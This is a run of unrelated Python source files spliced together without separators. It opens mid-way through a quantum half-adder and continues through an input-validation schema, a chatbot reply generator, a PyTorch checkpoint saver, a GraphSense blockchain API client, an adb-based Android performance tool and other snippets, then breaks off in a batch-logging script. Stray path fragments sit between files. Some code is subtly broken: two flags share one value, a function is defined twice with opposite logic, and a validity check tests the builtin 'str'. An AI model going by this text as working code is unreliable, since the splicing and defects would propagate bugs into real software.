use cnots to write XOR of the inputs on qubit2 qc_ha.cx(0, 2) qc_ha.cx(1, 2) # use ccx / toffoli gate to write AND of the inputs on qubit3 qc_ha.ccx(0, 1, 3) qc_ha.barrier() # extract outputs qc_ha.measure(2, 0) # extract XOR value qc_ha.measure(3, 1) # extract AND value # Execute the circuit on the qasm simulator job = q.execute(qc_ha, simulator, shots=1000) # Return the histogram data of the results of the experiment. return job.result().get_counts(qc_ha) if __name__ == "__main__": counts = half_adder(1, 1) print(f"Half Adder Output Qubit Counts: {counts}") app/src/app/shared/schema.py1-10 import datetime import json import uuid from app.shared.utils import async_call, camel_case, convert_timestamp from app.shared.validation import validate_base64, validate_hash, validate_url, validate_uuid NOT_DEFINED = str(uuid.uuid4()) REQUIRED = 1 INTEGER = 2 STRING = 4 BOOLEAN = 8 UUID = 16 EXPIRE = 32 BASE64 = 64 DEVICE_TOKEN = PLATFORM = 256 TIMESTAMP = 512 HASH = 1024 URL = 2048 class InputValues: def __init__(self, data=None): if not data: data = {} self._data = data def __str__(self): return str(self._data) def __repr__(self): return str(self._data) def __getitem__(self, key): return self._data.get(key) def __getattr__(self, key): return self._data.get(key) def __contains__(self, item): return self._data.__contains__(item) def __eq__(self, other): if isinstance(other, InputValues): return self._data == other._data elif isinstance(other, dict): return self._data == other else: return False def update(self, *args, **kwargs): return self._data.update(*args, **kwargs) def keys(self): return self._data.keys() def get(self, key, default=None): return self._data.get(key, default) class Schema: def __init__(self, **kwargs): schema_map = {} key_map = {} for k, v in kwargs.items(): schema_map[k] = v key_map[k.lower().replace('_', '')] = k self.schema_map = schema_map self.key_map = key_map async def load(self, input_data): values = InputValues() try: if input_data and isinstance(input_data, bytes): input_data = input_data.decode('utf-8') if input_data and isinstance(input_data, str): try: input_data = json.loads(input_data) except Exception: values.update(error='Invalid JSON') return values if input_data and not isinstance(input_data, dict): values.update(error='Invalid input data') return values except Exception: values.update(error='Invalid input data') return values mapped_values = {} if input_data: for key, value in input_data.items(): if key.lower() in self.key_map: key = self.key_map[key.lower()] if key not in self.schema_map: values.update(error=f'Unknown input: {key}') return values mapped_values[key] = value for key, definition in self.schema_map.items(): default = None if isinstance(definition, tuple): definition, default = definition value = mapped_values.get(key, NOT_DEFINED) external_key = camel_case(key) if definition & REQUIRED == REQUIRED and value in (NOT_DEFINED, None, '', [], {}): values.update(error=f'Missing required input: {external_key}') return values if value in (NOT_DEFINED, None, '', [], {}): if callable(default): value = await async_call(default()) else: value = default if definition & TIMESTAMP == TIMESTAMP and value is not None: ts = convert_timestamp(str(value)) if not ts or ts > datetime.datetime.utcnow() + datetime.timedelta(seconds=60): values.update(error=f'Invalid timestamp value: {external_key}') return values value = ts if definition & HASH == HASH and value is not None: value = str(value).lower() if not validate_hash(value): values.update(error=f'Invalid SHA3-256 hashed value: {external_key}') return values if definition & UUID == UUID and value is not None: value = str(value).lower() if not validate_uuid(value): values.update(error=f'Invalid UUID value: {external_key}') return values if definition & INTEGER == INTEGER and value is not None: try: value = int(value) except Exception: values.update(error=f'Invalid integer value: {external_key}') return values if definition & BOOLEAN == BOOLEAN and value is not True and value is not False: try: value = bool(int(value)) except Exception: values.update(error=f'Invalid boolean value: {external_key}') return values if definition & URL == URL and value: if not validate_url(str(value).lower()): values.update(error=f'Invalid url value: {external_key}') return values if definition & PLATFORM == PLATFORM and value: value = str(value).lower() if str(value).lower() not in ('apns', 'fcm'): values.update(error=f'Invalid platform value: {external_key}') return values if definition & DEVICE_TOKEN == DEVICE_TOKEN and value: value = str(value) if not str: # not implemented values.update(error=f'Invalid device token value: {external_key}') return values if definition & EXPIRE == EXPIRE and value is not None: try: value = int(value) if value < 30 or value > 300: raise Exception('Invalid value') except Exception: values.update(error=f'Invalid expire value: {external_key}') return values if definition & BASE64 == BASE64 and value is not None: try: if not validate_base64(str(value).encode('utf-8')): raise Exception('Invalid value') except Exception: values.update(error=f'Invalid base64 encoded value: {external_key}') return values values.update(**{key: value}) return values import os from conans.model.options import OptionsValues from conans.model.profile import Profile from conans.util.files import save def create_profile(folder, name, settings=None, package_settings=None, env=None, package_env=None, options=None): package_env = package_env or {} profile = Profile() profile.settings = settings or {} if package_settings: profile.package_settings = package_settings if options: profile.options = OptionsValues(options) for package_name, envs in package_env.items(): for var_name, value in envs: profile.env_values.add(var_name, value, package_name) for var_name, value in env or {}: profile.env_values.add(var_name, value) save(os.path.join(folder, name), profile.dumps()) from random import randint from core.nlp.response_generator.product.base.base_response_generator import BaseResponseGenerator class BfAttentionResponseGenerator(BaseResponseGenerator): """ This class deals with messages that mean user wants to get bf's attention """ def __call__(self): responses = self.__create_response_for_cant_get_attention_from_bf() self.set_regular_response(responses) return self.response_data @classmethod def __create_response_for_cant_get_attention_from_bf(cls): qr = cls.__create_qr_response() cmp_list = cls.__create_cmp_response() guess_list = cls.__create_guess_response() random_idx_for_cmp_list = randint(0, len(cmp_list) - 1) random_idx_for_guess_list = randint(0, len(guess_list) - 1) return qr + cmp_list[random_idx_for_cmp_list] + guess_list[ random_idx_for_guess_list] @classmethod def __create_qr_response(cls): qr_list = [ ["i am sorry to hear that"], ["omg.."], ["im sorry"], ["jeez.."], ["okay"] ] random_idx_for_qr_list = randint(0, len(qr_list) - 1) qr = qr_list[random_idx_for_qr_list] return qr @classmethod def __create_cmp_response(cls): adj_hard_list = ["difficult", "hard", "tough", "painful", "rough"] random_idx_for_adj_hard = randint(0, len(adj_hard_list) - 1) adj_hard = adj_hard_list[random_idx_for_adj_hard] cmp_list = [ ["i know waiting til he answers is so " + adj_hard + "😢"], ["its just so " + adj_hard + " to wait til he comes back to you right😓"], ["sounds " + adj_hard + " time for you til he will reach out to you😥"], ["i know its " + adj_hard + " that he doesnt pay attention to you😞"] ] return cmp_list @classmethod def __create_guess_response(cls): emotion_adj_list = ["anxious", "stressed", "uneasy", "insecure", "worried"] emotion_noun_list = ["anxiety", "stress", "uneasiness", "insecurity", "worry"] random_idx_for_emotion_adj = randint(0, len(emotion_adj_list) - 1) random_idx_for_emotion_noun = randint(0, len(emotion_noun_list) - 1) emotion_adj = emotion_adj_list[random_idx_for_emotion_adj] emotion_noun = emotion_noun_list[random_idx_for_emotion_noun] guess_list = [ ["it can give you major " + emotion_noun], ["it could make you feel like " + emotion_adj], ["you could feel like " + emotion_adj], ["could give you little " + emotion_noun] ] return guess_list import logging import random import numpy as np import pandas as pd import torch import torch.distributed as dist class CheckpointIO: """CheckpointIO class. It handles saving and loading checkpoints. """ def __init__(self, checkpoints_dir, model, optimizer, batch_sampler, metrics_names, num_checkpoints=1, remark=None): """ Args: checkpoint_dir (Path obj): path where checkpoints are saved model: model optimizer: optimizer batch_sampler: batch_sampler metrics_names: metrics names to be saved in a checkpoints csv file num_checkpoints: maximum number of checkpoints to save. When it exceeds the number, the older (older, smaller or higher) checkpoints will be deleted remark (optional): to remark the name of the checkpoint """ self.checkpoints_dir = checkpoints_dir self.checkpoints_dir.mkdir(parents=True, exist_ok=True) self.model = model self.optimizer = optimizer self.batch_sampler = batch_sampler self.num_checkpoints = num_checkpoints self.remark = remark self.value_list = [] self.epoch_list = [] self.checkpoints_csv_path = checkpoints_dir.joinpath('metrics_statistics.csv') # save checkpoints_csv header if dist.get_rank() == 0: metrics_keys_list = [name for name in metrics_names] header = ['epoch'] + metrics_keys_list df_header = pd.DataFrame(columns=header) df_header.to_csv(self.checkpoints_csv_path, sep='\t', index=False, mode='a+') def save(self, epoch, it, metrics, key_rank=None, rank_order='high', max_epoch=100): """Save model. It will save a latest model, a best model of rank_order for value, and 'self.num_checkpoints' best models of rank_order for value. Args: metrics: metrics to log key_rank (str): the key of metrics to rank rank_order: 'low' | 'high' | 'latest' 'low' to keep the models of lowest values 'high' to keep the models of highest values 'latest' to keep the models of latest epochs """ ## save checkpionts_csv metrics_values_list = [value for value in metrics.values()] checkpoint_list = [[epoch] + metrics_values_list] df_checkpoint = pd.DataFrame(checkpoint_list) df_checkpoint.to_csv(self.checkpoints_csv_path, sep='\t', header=False, index=False, mode='a+') ## save checkpoints current_value = None if rank_order == 'latest' else metrics[key_rank] # latest model latest_checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_latest.pth'.format(self.remark)) self.save_file(latest_checkpoint_path, epoch, it) # save 5 latest models # if epoch >= max_epoch - 5: # checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_{}th.pth'.format(self.remark, epoch)) # self.save_file(checkpoint_path, epoch, it) # if len(self.value_list) < self.num_checkpoints: # self.value_list.append(current_value) # self.epoch_list.append(epoch) # checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_{}.pth'.format(self.remark, epoch)) # self.save_file(checkpoint_path, epoch, it) # logging.info('Checkpoint saved to {}'.format(checkpoint_path)) # elif len(self.value_list) >= self.num_checkpoints: # value_list = np.array(self.value_list) # if rank_order == 'high' and current_value >= value_list.min(): # worst_index = value_list.argmin() # self.del_and_save(worst_index, current_value, epoch, it) # elif rank_order == 'low' and current_value <= value_list.max(): # worst_index = value_list.argmax() # self.del_and_save(worst_index, current_value, epoch, it) # elif rank_order == 'latest': # worst_index = 0 # self.del_and_save(worst_index, current_value, epoch, it) # best model # value_list = np.array(self.value_list) # best_checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_best.pth'.format(self.remark)) # if rank_order == 'high' and current_value >= value_list.max(): # self.save_file(best_checkpoint_path, epoch, it) # elif rank_order == 'low' and current_value <= value_list.min(): # self.save_file(best_checkpoint_path, epoch, it) # elif rank_order == 'latest': # self.save_file(best_checkpoint_path, epoch, it) def del_and_save(self, worst_index, current_value, epoch, it): """Delete and save checkpoint Args: worst_index: worst index, current_value: current value, epoch: epoch, it: it, """ worst_chpt_path = self.checkpoints_dir.joinpath('{}_epoch_{}.pth'.format(self.remark, self.epoch_list[worst_index])) if worst_chpt_path.is_file(): worst_chpt_path.unlink() self.value_list.pop(worst_index) self.epoch_list.pop(worst_index) self.value_list.append(current_value) self.epoch_list.append(epoch) checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_{}.pth'.format(self.remark, epoch)) self.save_file(checkpoint_path, epoch, it) logging.info('Checkpoint saved to {}'.format(checkpoint_path)) def save_file(self, checkpoint_path, epoch, it): """Save a module to a file Args: checkpoint_path (Path obj): checkpoint path, including .pth file name epoch: epoch, it: it """ outdict = { 'epoch': epoch, 'it': it, 'model': self.model.module.state_dict(), 'optimizer': self.optimizer.state_dict(), 'sampler': self.batch_sampler.get_state(), 'rng': torch.get_rng_state(), 'cuda_rng': torch.cuda.get_rng_state(), 'random': random.getstate(), 'np_random': np.random.get_state(), } torch.save(outdict, checkpoint_path) def load(self, checkpoint_path): """Load a module from a file """ state_dict = torch.load(checkpoint_path, map_location=torch.device('cpu')) epoch = state_dict['epoch'] it = state_dict['it'] self.model.module.load_state_dict(state_dict['model']) self.optimizer.load_state_dict(state_dict['optimizer']) self.batch_sampler.set_state(state_dict['sampler']) torch.set_rng_state(state_dict['rng']) torch.cuda.set_rng_state(state_dict['cuda_rng']) random.setstate(state_dict['random']) np.random.set_state(state_dict['np_random']) logging.info('Resuming complete from {}\n'.format(checkpoint_path)) return epoch, it ############################################################################### # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. ############################################################################### import os import tensorflow as _tf from distutils.version import StrictVersion is_tf2 = StrictVersion(_tf.__version__.split('-')[0]) >= StrictVersion('2.0.0') def normalize_tensor_shape(tensor_shape): if is_tf2: return [d for d in tensor_shape] else: return [d.value for d in tensor_shape] def dump_graph_into_tensorboard(tf_graph): # type: (_tf.Graph) -> None _tb_log_dir = os.environ.get('TB_LOG_DIR') if _tb_log_dir: if is_tf2: from tensorflow.python.ops.summary_ops_v2 import graph as write_graph pb_visual_writer = _tf.summary.create_file_writer(_tb_log_dir) with pb_visual_writer.as_default(): write_graph(tf_graph) else: from tensorflow.python.summary import summary pb_visual_writer = summary.FileWriter(_tb_log_dir) pb_visual_writer.add_graph(tf_graph) if is_tf2: tensorflow = _tf.compat.v1 def is_subclassed(layer): """Returns True if the object is a subclassed layer or subclassed model.""" return (layer.__module__.find('keras.engine') == -1 and layer.__module__.find('keras.layers') == -1) else: tensorflow = _tf def is_subclassed(layer): return False altescy/xsklearn from pathlib import Path XSKLEARN_ROOT = Path.home() / ".xsklearn" # cache settings CACHE_DIRRECTORY = XSKLEARN_ROOT / "cache" src/api_calls.py0 import requests import json from config import API_TOKEN # ask Matteo to get one api_path = 'https://api.graphsense.info/' headers = {'Accept': 'application/json', 'Authorization': API_TOKEN} def url2dict(url): # print(url) for i in range(4): # allow some failures r = requests.get(url, headers=headers) d = json.loads(r.text) if 'message' not in d: return d return d ############################## # API CALLS # **** WARNING ****: # Most of these calls are not up-to-date with the latest API and fail # I'm slowly updating them. # Look at https://api.graphsense.info/ to see current API docs ############################## def get_label(label): url = api_path + '/labelsearch?q=' + label return url2dict(url) def get_address_info(address, currency='btc'): url = api_path + currency + '/' + 'addresses/' + address return url2dict(url) def get_address_entityID(address, currency='btc'): address = str(address) url = api_path + currency + '/' + 'addresses/' + address + '/entity' d = url2dict(url) if d and 'entity' in d: entityID = d['entity'] return entityID return None def get_address_tags(address, currency='btc'): address = str(address) url = api_path + currency + '/' + 'addresses/' + address + '/tags' d = url2dict(url) if d: tags = list(set([el['label'] for el in d])) return tags return [] def get_address_tag(address, currency='btc'): tag = 'unknown' tags = get_address_tags(address, currency=currency) if tags: tag = tags[0] return tag def get_address_txs(address, currency='btc', page_size=10000): url = api_path + currency + '/' + 'addresses/' + address + '/txs?pagesize=' + str(page_size) d = url2dict(url) try: return d['address_txs'] except: print('fail', d) def get_address_txs_out(address, currency='btc'): txs = get_address_txs(address, currency=currency) tx_hashes_out = set() for tx in txs: if tx['value']['value'] < 0: tx_hashes_out.add(tx['tx_hash']) return tx_hashes_out def get_address_txs_out(address, currency='btc'): txs = get_address_txs(address, currency=currency) tx_hashes_out = set() for tx in txs: if tx['value']['value'] > 0: tx_hashes_out.add(tx['tx_hash']) return tx_hashes_out def get_address_neighbors_out(address, currency='btc', limit=0): # get all addresses receiving money from this address which means: # scan all edges and if source==address, select the target address = str(address) if not limit: limit = get_address_n_transactions_out(address, currency=currency) if not limit: return {} url = api_path + currency + '/' + 'address/' + address + '/neighbors?direction=out&limit=' + str(limit) d = url2dict(url) neighbors_out = set() if d: for e in d['edges']: if e['source'] == address: neighbors_out.add(e['target']) return neighbors_out def get_address_neighbors_in(address, currency='btc', limit=0): # get all addresses sending money to this address which means: # scan all edges and if target==address, select the source address = str(address) if not limit: limit = get_address_n_transactions_in(address, currency=currency) if not limit: return {} url = api_path + currency + '/' + 'address/' + address + '/neighbors?direction=in&limit=' + str(limit) d = url2dict(url) neighbors_in = set() if d: for e in d['edges']: if e['target'] == address: neighbors_in.add(e['source']) return neighbors_in def get_address_neighbors(address, currency='btc', limit=0): limit = int(limit/2) # because we do a union later neighbors_in = get_address_neighbors_in(address, currency=currency, limit=limit) neighbors_out = get_address_neighbors_out(address, currency=currency, limit=limit) return neighbors_out.union(neighbors_in) def get_address_money_in(address, currency='btc', coin='satoshi'): money = 0 info = get_address_info(address, currency=currency) if 'total_received' in info.keys(): money = info['total_received'][coin] return money def get_address_money_out(address, currency='btc', coin='satoshi'): money = 0 info = get_address_info(address, currency=currency) if 'total_spent' in info.keys(): money = info['total_spent'][coin] return money def get_address_n_transactions(address, currency='btc'): return get_address_n_transactions_out(address, currency=currency) + get_address_n_transactions_in(address, currency=currency) def get_address_n_transactions_out(address, currency='btc'): n = 0 info = get_address_info(address, currency=currency) if 'no_outgoing_txs' in info.keys(): n = info['no_outgoing_txs'] return n def get_address_n_transactions_in(address, currency='btc'): n = 0 info = get_address_info(address, currency=currency) if 'no_incoming_txs' in info.keys(): n = info['no_incoming_txs'] return n def get_address_balance(address, currency='btc', coin='eur'): balance = 0 info = get_address_info(address, currency=currency) if info: balance = info['balance'][coin] return balance def get_address_received(address, currency='btc', coin='eur'): received = 0 info = get_address_info(address, currency=currency) if info: received = info['total_received'][coin] return received def get_entity_info(entity, currency='btc'): url = api_path + currency + '/' + 'entities/' + str(entity) return url2dict(url) def get_entity_addresses(entity, currency='btc', page_size=10000): url = api_path + currency + '/' + 'entities/' + str(entity) + '/addresses?pagesize=' + str(page_size) res = url2dict(url) if 'addresses' in res: return [el['address'] for el in res['addresses']] else: return res def get_entity_tags(entity, currency='btc'): url = api_path + currency + '/' + 'entities/' + str(entity) + '/tags' d = url2dict(url) if d: tags = list(set([el['label'] for el in d])) return tags return ['Unknown'] def get_entity_tag(entity, currency='btc'): tag = 'Unknown' tags = get_entity_tags(entity, currency=currency) if tags: tag = tags[0] return tag def get_entity_n_neighbors_out(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'out_degree' in info.keys(): n = info['out_degree'] return n def get_entity_n_neighbors_in(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'in_degree' in info.keys(): n = info['in_degree'] return n def get_entity_neighbors_out(entity, currency='btc', limit=0): # get all entities receiving money from this entity which means: # scan all edges and if source==entity, select the target neighbors_out = set() if not limit: limit = get_entity_n_transactions_out(entity, currency=currency) if not limit: return neighbors_out url = api_path + currency + '/' + 'entities/' + str(entity) + '/neighbors?direction=out&limit=' + str(limit) d = url2dict(url) if d: for e in d['edges']: if e['source'] == entity: neighbors_out.add(e['target']) return neighbors_out def get_entity_neighbors_in(entity, currency='btc', limit=0): # get all entities sending money to this entity which means: # scan all edges and if target==entity, select the source neighbors_in = set() if not limit: limit = get_entity_n_transactions_out(entity, currency=currency) if not limit: return neighbors_in url = api_path + currency + '/' + 'entities/' + str(entity) + '/neighbors?direction=in&limit=' + str(limit) d = url2dict(url) neighbors_in = set() if d: for e in d['edges']: if e['target'] == entity: neighbors_in.add(e['source']) return neighbors_in def get_entity_neighbors(entity, currency='btc', limit=0): limit = int(limit/2) neighbors_in = get_entity_neighbors_in(entity, currency=currency, limit=limit) neighbors_out = get_entity_neighbors_out(entity, currency=currency, limit=limit) return neighbors_out.union(neighbors_in) def get_entity_n_transactions(entity, currency='btc'): return get_entity_n_transactions_out(entity, currency=currency) + get_entity_n_transactions_out(entity) def get_entity_n_transactions_out(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'no_outgoing_txs' in info.keys(): n = info['no_outgoing_txs'] return n def get_entity_n_transactions_in(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'no_incoming_txs' in info.keys(): n = info['no_incoming_txs'] return n def get_entity_balance(entity, currency='btc', coin='eur'): balance = 0 info = get_entity_info(entity, currency=currency) if info: balance = info['balance'][coin] return balance def get_entity_received(entity, currency='btc', coin='eur'): received = 0 info = get_entity_info(entity, currency=currency) if info: received = info['total_received'][coin] return received def get_entity_n_addresses(entity, currency='btc'): n_addresses = 0 info = get_entity_info(entity, currency=currency) if info: n_addresses = info['no_addresses'] return n_addresses def get_entity_txs_timestamps(entity, currency='btc'): # returns a list of transaction timestamps for a entity (or address) tss = [] # get all entity addresses txs addresses = get_entity_addresses(entity , currency=currency, limit=get_entity_info(entity, currency=currency)['no_addresses']) # for each address get txs_ts and append them for address in addresses: txs = get_address_txs(address, currency=currency, limit=get_address_n_transactions(address, currency=currency)+1) tmp = [el['timestamp'] for el in txs] for t in tmp: tss.append(t) return tss # TODO: # def get_entity_n_neighbors_in() # def get_entity_n_neighbors_out() # def get_entity_n_neighbors() # def get_entity_txs() # def get_entity_txs_out() # def get_entity_txs_in() def get_tx(tx_hash, currency='btc'): url = api_path + currency + '/' + 'txs/' + tx_hash return url2dict(url) def get_tx_addresses_in(tx_hash, currency='btc'): tx = get_tx(tx_hash, currency=currency) if 'inputs' in tx: return [el['address'] for el in tx['inputs']] return [] def get_tx_addresses_out(tx_hash, currency='btc'): tx = get_tx(tx_hash, currency=currency) addresses_out = [el['address'] for el in tx['outputs']] return addresses_out def get_tx_entity_in(tx_hash, currency='btc'): address_in = get_tx_addresses_in(tx_hash, currency=currency) if address_in: return get_address_entityID(address_in[0], currency=currency) return -1 def get_tx_entities_out(tx_hash, currency='btc'): entities_out = [get_address_entityID(addr, currency=currency) for addr in get_tx_addresses_out(tx_hash, currency=currency)] return entities_out def get_tx_tags_in(tx_hash, currency='btc'): tags_in = [get_address_tag(addr, currency=currency) for addr in get_tx_addresses_in(tx_hash, currency=currency)] return tags_in def get_tx_tags_out(tx_hash, currency='btc'): tags_out = [get_address_tag(addr, currency=currency) for addr in get_tx_addresses_out(tx_hash, currency=currency)] return tags_out def get_tx_values_out(tx_hash, currency='btc', coin='eur'): return [el['value'][coin] for el in get_tx(tx_hash, currency=currency)['outputs']] def get_tx_values_in(tx_hash, currency='btc', coin='eur'): return [el['value'][coin] for el in get_tx(tx_hash, currency=currency)['inputs']] def get_addresses_txs(addresses, currency='btc', direction='both'): addresses_txs = dict() # key: address, value: list of txs ln = len(addresses) addresses = list(addresses) addresses.sort() for i, addr in enumerate(addresses): print(ln, i, addr, end='\r') if direction == 'in': addresses_txs[addr] = [get_tx(hsh, currency=currency) for hsh in get_address_txs_in(addr, currency=currency)] if direction == 'out': addresses_txs[addr] = [get_tx(hsh, currency=currency) for hsh in get_address_txs_out(addr, currency=currency)] if direction == 'both': addresses_txs[addr] = [get_tx(hsh, currency=currency) for hsh in get_address_txs(addr, currency=currency)] return addresses_txs def get_block_hash(height, currency='btc'): url = api_path + currency + '/' + 'block/' + str(height) return url2dict(url)['block_hash'] def get_block_n_txs(height, currency='btc'): url = api_path + currency + '/' + 'block/' + str(height) return url2dict(url)['no_txs'] 0 import random import copy # Consider using the modules imported above. class Hat: def __init__(self, **kwargs): self.contents = self.create_contents(kwargs) def create_contents(self, obj): contents = [] for k, v in obj.items(): n = v while n > 0: contents.append(k) n -= 1 return contents def draw(self, n): if n >= len(self.contents): return self.contents removed = [] for x in range(n): random_ball = random.choice(self.contents) self.contents.remove(random_ball) removed.append(random_ball) return removed def experiment(hat, expected_balls, num_balls_drawn, num_experiments): successfull_experiments = 0 for x in range(num_experiments): is_successfull = True testing_hat = copy.deepcopy(hat) balls_drawn_list = testing_hat.draw(num_balls_drawn) balls_drawn_dict = dict() for ball in balls_drawn_list: balls_drawn_dict[ball] = balls_drawn_dict.get(ball, 0) + 1 for color in expected_balls.keys(): if color not in balls_drawn_dict: is_successfull = False elif balls_drawn_dict[color] < expected_balls[color]: is_successfull = False if is_successfull is True: successfull_experiments += 1 return successfull_experiments / num_experiments1-10 import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name = 'sb2l', packages=setuptools.find_packages(), version = '0.1.3', license='MIT', description = 'sb2l Translates the biological models written in SBML into LaTeX code to be compiled and read by human eye', long_description=long_description, long_description_content_type="text/markdown", author = ', ', author_email = '', url = 'https://github.com/X-Jiang-bioe/sb2l', download_url = 'https://github.com/X-Jiang-bioe/sb2l/archive/v_0.1.3.tar.gz', package_data={ '': ['*.rtf'], # to include yarosh files }, keywords = ['SBML', 'LaTeX', 'Converter'], install_requires=[ 'pylatex', 'python-libsbml', ], python_requires='>=3', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Science/Research', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', ], ) import torch as th def smallest_positive(inputs, dim): """ Args inputs: 3d array [B,T,L]. dim: dimension on which the largest tj lower than t is evaluated. Return (delta_t, idx_delta_t), is_candidate: delta_t: t - tj, where th is the largest value lower than t idx_delta_t: position of the largest tj lower than t is_candidate: mask to remove padded points """ non_positives = inputs <= 0 # [B,T,L] non_positives = non_positives.float() # [B,T,L] min_inputs, max_inputs = th.min(inputs), th.max(inputs) # 1,1 shift_matrix = (max_inputs - min_inputs) * non_positives * 2 # [B,T,L] shifted_matrix = inputs + shift_matrix # [B,T,L] is_candidate = inputs > 0 # [B,T,L] is_candidate = th.sum(is_candidate, dim=2) # [B,T] is_candidate = (is_candidate > 0).type(inputs.dtype) # [B,T] result = th.min(shifted_matrix, dim=dim) # [B,T] return result, is_candidate # [B,T], [B,T] # recursively import every submodule at runtime # source: https://stackoverflow.com/questions/3365740/how-to-import-all-submodules import pkgutil __all__ = [] for loader, module_name, is_pkg in pkgutil.walk_packages(__path__): __all__.append(module_name) _module = loader.find_module(module_name).load_module(module_name) globals()[module_name] = _module import os from andperf._config import AndPerfConfig from andperf._util import open_with_webbrowser, sh from andperf.gfxinfo import Gfxinfo from andperf.meminfo import Meminfo from andperf.stat_thread import StatThread class AndPerf: def __init__(self): self._config = AndPerfConfig() def _get_app(self, app: str) -> str: return self._config.get('app', app) ################################ # Config ################################ def config(self, **kargs): """ 添加默认配置 Parameters: - app: 默认的perf app,不用每次指定app参数 """ self._config.update(**kargs) def dump_config(self): """ dump 当前的配置 """ self._config.dump() ################################ # Meminfo ################################ def meminfo(self, *, app: str = None): """ 查看app当前的meminfo 信息 """ return Meminfo.dump(self._get_app(app)).meminfo def meminfo_pie(self, *, app: str = None): """ 将app的当前内存占用以饼图的形式展示出来 """ Meminfo.dump(self._get_app(app)).pie() def meminfo_trend(self, period: int = 1, app: str = None): """ App 内存占用趋势图 Parameters: - period: 每次采样的间隔,采样周期 - app: app package name """ Meminfo.trend(self._get_app(app), period) ################################ # Cpu Info ################################ def cpuinfo(self): """ 查看当前的cpu信息 """ print(sh("adb shell dumpsys cpuinfo")) def stat_thread(self, *, interval: int = 10, app: str = None): """ 统计一段时间内App内各个线程cpu时间片占比 Paramters: - interval: 统计间隔 """ StatThread(self._get_app(app)).stat_t(interval) ################################ # Gfx Info ################################ def gfx_reset(self, *, app: str = None): app = self._get_app(app) Gfxinfo.reset(app) print('reset done!') def gfxinfo(self, *, app: str = None): """ 查看app的gfxinfo """ return Gfxinfo.dump(self._get_app(app)).gfxinfo def gfx_hist(self, *, app: str = None): """ 查看每帧绘制耗时的直方图分布 """ Gfxinfo.dump(self._get_app(app)).hist() def gfx_fps(self, *, interval: int = 2, plot: bool = True, app: str = None): """ 计算fps, 并绘制fps变化走势图 """ Gfxinfo.trend(self._get_app(app), interval, plot) ################################ # Helper ################################ def dump_layout(self): """ 导出当前TOP Activity的布局 """ sh('adb shell uiautomator dump /sdcard/window_dump.xml; adb pull /sdcard/window_dump.xml') path = f'file://{os.path.abspath(".")}/window_dump.xml' open_with_webbrowser(path) def top_activity(self): """ 找出当前栈顶的页面 """ print() return sh("adb shell dumpsys activity activities | grep ResumedActivity | tail -1 | awk '{print $4}'") def top_app(self): """ 当前活跃的app package name """ print(self.top_activity().split('/')[0]) def screencap(self, file: str = "AndPerfScreencap.png"): """ 截图 Parameters: - file: 截图保存的file """ sh(f"adb shell screencap /sdcard/screencap.png; adb pull /sdcard/screencap.png {file}") open_with_webbrowser(f'file://{os.path.abspath(".")}/{file}') def dev_screen(self): """ 获取手机屏幕信息 """ print(sh("adb shell wm size")) print("density:", sh("adb shell getprop ro.sf.lcd_density")) def dev_mem(self): """ 设备内存大小信息 """ print(sh("adb shell cat /proc/meminfo")) print("LOW MEM?", sh("adb shell getprop ro.config.low_ram").strip() or "false") def systrace(self, *, app: str = None): """ 使用systrace """ app = self._get_app(app) systrace = self._config.get( 'systrace', '~/Library/Android/sdk/platform-tools/systrace/systrace.py') if not os.path.exists(os.path.expanduser(systrace)): print("no found systrace.py, please config using key: systrace") return print('wait for a while, generating systrace') out = f'{app}_systrace.html' try: sh(f"python2.7 {systrace} --app={app} --time=10 -o {out}") except Exception: print("need cmd python2.7 avaliable in path") return import webbrowser chrome = webbrowser.get('chrome') if chrome: chrome.open(f'file://{os.path.abspath(".")}/{out}') else: print(f'>>> 请使用chrome 打开 file://{os.path.abspath(".")}/{out}') def main(): import fire fire.Fire(AndPerf) if __name__ == '__main__': main() worker/models.py """module containing data models used by module""" import logging import json import uuid from typing import Any, List, Dict from datetime import datetime from pydantic import BaseModel LOGGER = logging.getLogger(__name__) class SpanTag(BaseModel): """Data class containing fields for a jaeger span""" key: str value_type: str value: Any class Config: fields = { 'value_type': 'type' } class JaegerProcess(BaseModel): """Data class containing fields for a jaeger process""" service_name: str tags: List[SpanTag] class Config: fields = { 'service_name': 'serviceName' } class JaegerSpan(BaseModel): """Data class containing fields to encapsulate a jaeger span""" trace_id: str span_id: str flags: int operation_name: str references: List start_time: datetime duration: int tags: List[SpanTag] logs: List process_id: str warnings: Any class Config: fields = { 'operation_name': 'operationName', 'start_time': 'startTime', 'trace_id': 'traceID', 'span_id': 'spanID', 'process_id': 'processID' } class JaegerTrace(BaseModel): """Data class containing fields needed for a complete jaeger trace""" trace_id: str spans: List[JaegerSpan] processes: Dict[str, JaegerProcess] warnings: Any class Config: fields = { 'trace_id': 'traceID' } if __name__ == '__main__': with open('./trace.json', 'r') as f: payload = json.load(f) trace = JaegerTrace(**payload) print(trace)batch.py import os import sys import numpy as np import pandas as pd import logging as log import datetime as dt import matplotlib.pyplot as plt from textwrap import TextWrapper as txwr import galaxy import post_process as pp Galaxy = galaxy.Galaxy # Create the /Logs folder for the root directory if it doesn't already exist if not os.path.isdir("Logs") : os.mkdir("Logs") def dateFmt () : """Returns the date component of the run log file""" dtStr = str(dt.datetime.now()) dtStr = dtStr[:dtStr.find('.')] dtStr = dtStr.replace(' ', '_') return dtStr # Set the logger for this run of classifications runlog = log.getLogger(__name__) runlog.setLevel(log.INFO) runLogPath = "Logs/run_{}.log".format(dateFmt()) fileHandler = log.FileHandler(runLogPath) fileHandler.setFormatter(log.Formatter("%(levelname)s : RUN_INIT : %(asctime)s : %(message)s", datefmt='%m/%d/%Y %I:%M:%S %p')) # Ensures that there is only one fileHandler for the current logger for h in runlog.handlers : 